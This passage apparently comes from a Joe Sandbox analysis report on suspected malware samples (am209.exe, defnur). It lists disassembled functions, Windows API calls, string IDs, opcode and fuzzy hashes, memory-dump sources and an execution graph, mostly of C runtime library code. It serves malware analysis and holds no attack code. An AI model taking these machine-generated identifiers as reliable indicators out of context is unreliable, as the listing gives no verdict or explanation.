                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.2387791892.00000000006FD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_690000_am209.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ErrorHandling__start
                                                                                                                                                                                                                                                    • String ID: pow
                                                                                                                                                                                                                                                    • API String ID: 3213639722-2276729525
                                                                                                                                                                                                                                                    • Opcode ID: 7445bcc556111529a94f95d3e24b0dfc4e5387c5e08dc4c54a6941df7aef0f91
                                                                                                                                                                                                                                                    • Instruction ID: e906cfe241398361098246756e38d8d5b1b3a0ecc98013b1e04fe6e075149a08
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7445bcc556111529a94f95d3e24b0dfc4e5387c5e08dc4c54a6941df7aef0f91
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CC51AF70B0424196CB167B14CD45FFA2BF3EB40700F34CD5DE0D6463A9EB768DA69A8A
                                                                                                                                                                                                                                                    Function 0069DB20 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 183COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 006B4550: std::locale::_Init.LIBCPMT ref: 006B45E2
                                                                                                                                                                                                                                                    • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 0069DD18
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000008.00000002.2387544658.0000000000691000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00690000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.2387512824.0000000000690000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.2387644867.00000000006E1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.2387735309.00000000006F6000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.2387791892.00000000006FD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_690000_am209.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: InitIos_base_dtorstd::ios_base::_std::locale::_
                                                                                                                                                                                                                                                    • String ID: `$xn
                                                                                                                                                                                                                                                    • API String ID: 3469404174-4164553564
                                                                                                                                                                                                                                                    • Opcode ID: 30df580ebf5895a15842e178b4fc8a6d41bc0aae537c971294a68d26d909aca2
                                                                                                                                                                                                                                                    • Instruction ID: f33c94b57f3d29c13480b1e751aecfd11ff06542ec77eb9c73b08f8c9b1bcc60
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 30df580ebf5895a15842e178b4fc8a6d41bc0aae537c971294a68d26d909aca2
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B7714870A01248DFEB14DF68CD94B9DBBBABB04304F1486ADE4099B281E7759A88CF50
                                                                                                                                                                                                                                                    Function 006C3A92 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 123COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000008.00000002.2387544658.0000000000691000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00690000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.2387512824.0000000000690000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.2387644867.00000000006E1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.2387735309.00000000006F6000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.2387791892.00000000006FD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_690000_am209.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\1004899001\am209.exe
                                                                                                                                                                                                                                                    • API String ID: 0-2661768961
                                                                                                                                                                                                                                                    • Opcode ID: 22d65dcb21ef9610d2ad20d47b597caf50a57ee957fcc759d059837715e2bc48
                                                                                                                                                                                                                                                    • Instruction ID: edd9aac8fdb0d0b227b42c523b6baf1a9c6f7cb5320f2b0375279d5f257d8c69
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 22d65dcb21ef9610d2ad20d47b597caf50a57ee957fcc759d059837715e2bc48
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 97418071A00224AFDB21AF99D881FFEBBBAEB95310F14806EE504D7351D6709F41CBA4
                                                                                                                                                                                                                                                    Function 006BCFEC Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112COMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 006BD011
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000008.00000002.2387544658.0000000000691000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00690000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.2387512824.0000000000690000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.2387644867.00000000006E1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.2387735309.00000000006F6000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.2387791892.00000000006FD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_690000_am209.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: EncodePointer
                                                                                                                                                                                                                                                    • String ID: MOC$RCC
                                                                                                                                                                                                                                                    • API String ID: 2118026453-2084237596
                                                                                                                                                                                                                                                    • Opcode ID: 0b257e67ac778c92f171f22e1305f6606e38d92689cc3334c177ac17637a8254
                                                                                                                                                                                                                                                    • Instruction ID: 65de4d57610027faed9e0a12cba433a64ad48d822d3d1449b859a91f78d3d6d6
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0b257e67ac778c92f171f22e1305f6606e38d92689cc3334c177ac17637a8254
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 36416DB1900209EFCF16DF98CD81AEEBBB6FF48304F144059FA046B251E3359991DB55
                                                                                                                                                                                                                                                    Function 006CFA33 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 99COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 006CF7DD: GetOEMCP.KERNEL32(00000000,006CFA4E,?,?,006BEFF2,006BEFF2,?), ref: 006CF808
                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 006CFAAB
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000008.00000002.2387544658.0000000000691000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00690000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.2387512824.0000000000690000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.2387644867.00000000006E1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.2387735309.00000000006F6000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.2387791892.00000000006FD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_690000_am209.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: _free
                                                                                                                                                                                                                                                    • String ID: hfo
                                                                                                                                                                                                                                                    • API String ID: 269201875-1462760290
                                                                                                                                                                                                                                                    • Opcode ID: 4ddd80c7ca7e4c5268752d05b44bb05747a635da1369d716539f5394dbe3fcad
                                                                                                                                                                                                                                                    • Instruction ID: 818b6f37ffc5aa8ea85bb42e86beda5b8747872d71fe0d39e3d68b590f013b95
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4ddd80c7ca7e4c5268752d05b44bb05747a635da1369d716539f5394dbe3fcad
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 48316C72900209AFDB11DF98D880FEAB7E6EF44314F15406EF9149B2A1EB329D51CB60
                                                                                                                                                                                                                                                    Function 006BE76A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 73COMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 006BE878: _free.LIBCMT ref: 006BE886
                                                                                                                                                                                                                                                      • Part of subcall function 006C8353: MultiByteToWideChar.KERNEL32(006CFCD8,00000100,E8458D00,00000000,00000000,00000020,?,006CC2A0,00000000,00000000,00000100,00000020,00000000,00000000,E8458D00,00000100), ref: 006C83C3
                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,006BE92F,00000000,?,00000000,6F380EF0), ref: 006BE7CE
                                                                                                                                                                                                                                                    • __dosmaperr.LIBCMT ref: 006BE7D5
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000008.00000002.2387544658.0000000000691000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00690000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.2387512824.0000000000690000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.2387644867.00000000006E1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.2387735309.00000000006F6000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.2387791892.00000000006FD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_690000_am209.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ByteCharErrorLastMultiWide__dosmaperr_free
                                                                                                                                                                                                                                                    • String ID: /k
                                                                                                                                                                                                                                                    • API String ID: 4030486722-1319554990
                                                                                                                                                                                                                                                    • Opcode ID: ee7f7c0137c8bf8fdd6912110ddc3fe56ed6f747834eed9907ebb91a9c4160c6
                                                                                                                                                                                                                                                    • Instruction ID: 146f47fac7cbfcdcb2c7b37a752f24e29cac1a4c0a895084b922d43bf0cc25d5
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ee7f7c0137c8bf8fdd6912110ddc3fe56ed6f747834eed9907ebb91a9c4160c6
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 60212BB16006156BDB215F259C01EEB779BEF81330F11852DF8299B291DB32EC80C7D1
                                                                                                                                                                                                                                                    Function 006B7D3A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 73COMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • __alloca_probe_16.LIBCMT ref: 006B7DC2
                                                                                                                                                                                                                                                    • RaiseException.KERNEL32(?,?,?,?), ref: 006B7DE7
                                                                                                                                                                                                                                                      • Part of subcall function 006BAF76: RaiseException.KERNEL32(E06D7363,00000001,00000003,006F39C4,?,?,?,006F39C4), ref: 006BAFD6
                                                                                                                                                                                                                                                      • Part of subcall function 006BDE94: IsProcessorFeaturePresent.KERNEL32(00000017,006C6DAC,?,?,006BE157,?,?,?,?,006BEFF2,?), ref: 006BDEB0
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000008.00000002.2387544658.0000000000691000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00690000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.2387512824.0000000000690000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.2387644867.00000000006E1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.2387735309.00000000006F6000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.2387791892.00000000006FD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_690000_am209.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ExceptionRaise$FeaturePresentProcessor__alloca_probe_16
                                                                                                                                                                                                                                                    • String ID: csm
                                                                                                                                                                                                                                                    • API String ID: 1924019822-1018135373
                                                                                                                                                                                                                                                    • Opcode ID: 3947a7479bd5b5c90ad94bd6597aa7ac7e9657a0574a607f85e17a2395085be0
                                                                                                                                                                                                                                                    • Instruction ID: 8e8d64bc9a0f422d807665fbf5aa87ff33515f8ae97260c34e8ca3735e5c0364
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3947a7479bd5b5c90ad94bd6597aa7ac7e9657a0574a607f85e17a2395085be0
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 192159B1D04218AFCF24DF98C841AFEB7BBAF84750F64040DE905AB250DA30AD85CB85
                                                                                                                                                                                                                                                    Function 006C0CF5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000008.00000002.2387544658.0000000000691000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00690000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.2387512824.0000000000690000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.2387644867.00000000006E1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.2387735309.00000000006F6000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.2387791892.00000000006FD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_690000_am209.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: _free
                                                                                                                                                                                                                                                    • String ID: 0bo
                                                                                                                                                                                                                                                    • API String ID: 269201875-1374439790
                                                                                                                                                                                                                                                    • Opcode ID: 6ecc485dcb505b5f205999af0089cc750768d43dd5a3c630c0d8c78c4d8025ea
                                                                                                                                                                                                                                                    • Instruction ID: 5a3aa7e37f533e863c52a22b18b5c8b9f03d891de793269d1bc222fd637a4e42
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6ecc485dcb505b5f205999af0089cc750768d43dd5a3c630c0d8c78c4d8025ea
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4411B672A002109AEB20AF69AC41FB5379BEB50730F24121EF962DB2E4D770FC468755
                                                                                                                                                                                                                                                    Function 006944C0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 006944EB
                                                                                                                                                                                                                                                    • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0069453A
                                                                                                                                                                                                                                                      • Part of subcall function 006B886E: _Yarn.LIBCPMT ref: 006B888D
                                                                                                                                                                                                                                                      • Part of subcall function 006B886E: _Yarn.LIBCPMT ref: 006B88B1
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000008.00000002.2387544658.0000000000691000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00690000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.2387512824.0000000000690000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.2387644867.00000000006E1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.2387735309.00000000006F6000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.2387791892.00000000006FD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_690000_am209.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Yarnstd::_$Locinfo::_Locinfo_ctorLockitLockit::_
                                                                                                                                                                                                                                                    • String ID: bad locale name
                                                                                                                                                                                                                                                    • API String ID: 1908188788-1405518554
                                                                                                                                                                                                                                                    • Opcode ID: 0c39ca8e088785b2b18b2cfd2dc25e56d8dada96b0e33bf768d1024165bd3520
                                                                                                                                                                                                                                                    • Instruction ID: 82ed34827a5a97760cc33b6956949a22ba2c8c99ed5bb190c605801e90dbaf03
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0c39ca8e088785b2b18b2cfd2dc25e56d8dada96b0e33bf768d1024165bd3520
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3011A0B1904B849FD320CF69C905B57BBE8EF19710F004A5EE899C7B81EB75A904CB95
                                                                                                                                                                                                                                                    Function 006D13EA Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000008.00000002.2387544658.0000000000691000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00690000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.2387512824.0000000000690000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.2387644867.00000000006E1000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.2387735309.00000000006F6000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000008.00000002.2387791892.00000000006FD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_690000_am209.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: _free
                                                                                                                                                                                                                                                    • String ID: pNn
                                                                                                                                                                                                                                                    • API String ID: 269201875-1866506134
                                                                                                                                                                                                                                                    • Opcode ID: c5732928236578cc248bfa9217e6b207f3497c3ca96e50a263c33eeecdc9508d
                                                                                                                                                                                                                                                    • Instruction ID: 6bc8955ae7966e1cc9a8557c2e5f3b6a7a2810ed0cb9932102d11b965525b47a
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c5732928236578cc248bfa9217e6b207f3497c3ca96e50a263c33eeecdc9508d
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B2F0A4329082107AE7207A62A842BA777DBEB42774F24002FF90C5E383DEA1180241B9

                                                                                                                                                                                                                                                    Execution Graph

                                                                                                                                                                                                                                                    Execution Coverage:0.5%
                                                                                                                                                                                                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                                    Signature Coverage:0%
                                                                                                                                                                                                                                                    Total number of Nodes:76
                                                                                                                                                                                                                                                    Total number of Limit Nodes:3
                                                                                                                                                                                                                                                    execution_graph 24712 dfa055 24713 dfa061 ___scrt_is_nonwritable_in_current_image 24712->24713 24738 df9d7b 24713->24738 24715 dfa068 24716 dfa1c1 24715->24716 24726 dfa092 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock CallUnexpected 24715->24726 24764 dfa3c5 4 API calls 2 library calls 24716->24764 24718 dfa1c8 24760 dfde7e 24718->24760 24722 dfa1d6 24723 dfa0b1 24724 dfa132 24746 e0423b 24724->24746 24726->24723 24726->24724 24763 dfde58 37 API calls 4 library calls 24726->24763 24728 dfa138 24750 df0cd0 24728->24750 24739 df9d84 24738->24739 24766 dfa5af IsProcessorFeaturePresent 24739->24766 24741 df9d90 24767 dfc699 10 API calls 2 library calls 24741->24767 24743 df9d95 24744 df9d99 24743->24744 24768 dfc6b8 7 API calls 2 library calls 24743->24768 24744->24715 24747 e04244 24746->24747 24748 e04249 24746->24748 24769 e03d96 49 API calls 24747->24769 24748->24728 24751 df0cdb 24750->24751 24770 de1600 113 API calls 24751->24770 24771 dfdd1c 24760->24771 24763->24724 24764->24718 24765 dfde42 23 API calls CallUnexpected 24765->24722 24766->24741 24767->24743 24768->24744 24769->24748 24772 dfdd3c 24771->24772 24773 dfdd2a 24771->24773 24783 dfdbc3 24772->24783 24799 dfa4e5 GetModuleHandleW 24773->24799 24776 dfdd2f 24776->24772 24800 dfddc2 GetModuleHandleExW 24776->24800 24778 dfa1ce 24778->24765 24781 dfdd7f 24784 dfdbcf ___scrt_is_nonwritable_in_current_image 24783->24784 24806 e02610 EnterCriticalSection 24784->24806 24786 dfdbd9 24807 dfdc2f 24786->24807 24788 dfdbe6 24811 dfdc04 24788->24811 24791 dfdd80 24816 e06212 GetPEB 24791->24816 24794 dfddaf 24797 dfddc2 CallUnexpected 3 API calls 24794->24797 24795 dfdd8f GetPEB 24795->24794 24796 dfdd9f GetCurrentProcess TerminateProcess 24795->24796 24796->24794 24798 dfddb7 ExitProcess 24797->24798 24799->24776 24801 dfde04 24800->24801 24802 dfdde1 GetProcAddress 24800->24802 24804 dfde0a FreeLibrary 24801->24804 24805 dfdd3b 24801->24805 24803 dfddf6 24802->24803 24803->24801 24804->24805 24805->24772 24806->24786 24808 dfdc3b ___scrt_is_nonwritable_in_current_image 24807->24808 24810 dfdc9c CallUnexpected 24808->24810 24814 e04523 14 API calls CallUnexpected 24808->24814 24810->24788 24815 e02658 LeaveCriticalSection 24811->24815 24813 dfdbf2 24813->24778 24813->24791 24814->24810 24815->24813 24817 dfdd8a 24816->24817 24818 e0622c 24816->24818 24817->24794 24817->24795 24820 e086ef 24818->24820 24823 e0866c 24820->24823 24824 e0869a 24823->24824 24827 e08696 24823->24827 24824->24827 24830 e085a5 24824->24830 24827->24817 24828 e086b4 GetProcAddress 24828->24827 24829 e086c4 std::_Locinfo::_Locinfo_ctor 24828->24829 24829->24827 24835 e085b6 ___vcrt_FlsFree 24830->24835 24831 e08661 24831->24827 24831->24828 24832 e085d4 LoadLibraryExW 24833 e085ef GetLastError 24832->24833 24832->24835 24833->24835 24834 e0864a FreeLibrary 24834->24835 24835->24831 24835->24832 24835->24834 24836 e08622 LoadLibraryExW 24835->24836 24836->24835

                                                                                                                                                                                                                                                    Executed Functions

                                                                                                                                                                                                                                                    Function 00DFDD80 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetCurrentProcess.KERNEL32(?,?,00DFDD7F,?,?,?,?,?,00DFEFF2), ref: 00DFDDA2
                                                                                                                                                                                                                                                    • TerminateProcess.KERNEL32(00000000,?,00DFDD7F,?,?,?,?,?,00DFEFF2), ref: 00DFDDA9
                                                                                                                                                                                                                                                    • ExitProcess.KERNEL32 ref: 00DFDDBB
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000009.00000002.2389300866.0000000000DD1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00DD0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.2389268559.0000000000DD0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.2389361077.0000000000E21000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.2389397591.0000000000E36000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.2389434516.0000000000E3D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_dd0000_defnur.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Process$CurrentExitTerminate
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 1703294689-0
                                                                                                                                                                                                                                                    • Opcode ID: e76980279c4bfe1c1d781e7479109ab52599c9c94d343507194703f1e936b9a1
                                                                                                                                                                                                                                                    • Instruction ID: 7dfb598f19776b20c81da5437157d57fd9aed2d127234df2bcce7913fac6261d
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e76980279c4bfe1c1d781e7479109ab52599c9c94d343507194703f1e936b9a1
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E8E0B63201124CEFCF617B69DC09A583B6AEB50341B058554F905DA132CB35DE92EA60
                                                                                                                                                                                                                                                    Function 00E085A5 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 77COMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 0 e085a5-e085b1 1 e08658-e0865b 0->1 2 e08661 1->2 3 e085b6-e085c7 1->3 6 e08663-e08667 2->6 4 e085d4-e085ed LoadLibraryExW 3->4 5 e085c9-e085cc 3->5 9 e0863f-e08648 4->9 10 e085ef-e085f8 GetLastError 4->10 7 e085d2 5->7 8 e08655 5->8 11 e08651-e08653 7->11 8->1 9->11 12 e0864a-e0864b FreeLibrary 9->12 13 e085fa-e0860c call e061d8 10->13 14 e0862f 10->14 11->8 16 e08668-e0866a 11->16 12->11 13->14 20 e0860e-e08620 call e061d8 13->20 15 e08631-e08633 14->15 15->9 18 e08635-e0863d 15->18 16->6 18->8 20->14 23 e08622-e0862d LoadLibraryExW 20->23 23->15
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000009.00000002.2389300866.0000000000DD1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00DD0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.2389268559.0000000000DD0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.2389361077.0000000000E21000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.2389397591.0000000000E36000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000009.00000002.2389434516.0000000000E3D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_dd0000_defnur.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID: api-ms-$ext-ms-
                                                                                                                                                                                                                                                    • API String ID: 0-537541572
                                                                                                                                                                                                                                                    • Opcode ID: ed829afc43fbf373f064fa18f34479538ecfcdd121b07b2367e50df7ee4d2740
                                                                                                                                                                                                                                                    • Instruction ID: 0cc00969e6ce50ff3e0e9714570526395bd1651693cfdd02bfc95c81827ec996
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ed829afc43fbf373f064fa18f34479538ecfcdd121b07b2367e50df7ee4d2740
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 27213532A01320EBCB318A34AE44A5A37689B217A4F122161EC96B72D0DF31DD4186E0
